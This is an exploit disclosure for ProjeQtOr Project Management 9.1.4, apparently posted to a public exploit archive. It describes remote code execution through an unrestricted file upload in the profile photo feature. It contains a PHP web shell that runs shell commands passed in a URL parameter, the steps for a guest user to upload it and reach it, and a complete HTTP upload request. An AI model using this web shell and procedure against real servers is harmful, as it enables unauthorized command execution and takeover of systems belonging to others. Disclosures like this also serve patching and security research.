# Exploit Title: ProjeQtOr Project Management 9.1.4 - Remote Code Execution  
# Date: 29.05.2021  
# Exploit Author: Temel Demir  
# Vendor Homepage:  
# Software Link:  
# Version: v9.1.4  
# Tested on: Laragon @WIN10  
# Description : Remote code execution and authorization upgrade with guest user. A malicious file can be run with arbitrary file upload in the profile editing section.   
PoC Process Step_by_Step:  
# 1) Create a file with the below php code and save it as demir.pHp  
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>  
# 2) Login to ProjeQtOr portal as guest user  
# 3) Click -profile- button on header panel.  
# 4) Click -add photo- button and chose upload section and browse your demir.pHp file.  
# 5) Click OK. Script will give you "Attachment #($number) inserted". Attachment number need us for file path. (demo: attachment number is "23" > file directory "/files/attach//attachment_23/" )  
# 6) As a last step you have to add the ".projeqtor" statement to the file extension.  
You can call the uploaded file like this > http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor  
# 7) Exploit: http://ip:port/files/attach/attachment_1/demir.pHp.projeqtor?key=[command]  
Example Request:  
POST /project/tool/saveAttachment.php HTTP/1.1  
Host: ip:port  
Content-Length: 1196  
Accept: application/json  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/85.0.4183.83 Safari/537.36  
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryEPEodMA4Ojb7pSuQ  
Origin: http://ip:port/website_location/  
Sec-Fetch-Site: same-origin  
Sec-Fetch-Mode: cors  
Sec-Fetch-Dest: empty  
Referer: http://ip:port/website_location/view/main.php  
Accept-Encoding: gzip, deflate  
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8  
Cookie: PHPSESSID=($your_phpsessid_c //edit); projeqtor=($your_projeqtor_c //edit)  
Connection: close  
Content-Disposition: form-data; name="attachmentFiles[]"; filename="demir.pHp"  
Content-Type: application/octet-stream  
<?php echo shell_exec($_GET['key'].' 2>&1'); ?>  
Content-Disposition: form-data; name="attachmentId"  
Content-Disposition: form-data; name="attachmentRefType"  
Content-Disposition: form-data; name="attachmentRefId"  
($your_profile_id //edit)  
Content-Disposition: form-data; name="attachmentType"  
Content-Disposition: form-data; name="MAX_FILE_SIZE"  
Content-Disposition: form-data; name="attachmentLink"  
Content-Disposition: form-data; name="attachmentDescription"  
Content-Disposition: form-data; name="attachmentPrivacy"  
Content-Disposition: form-data; name="uploadType"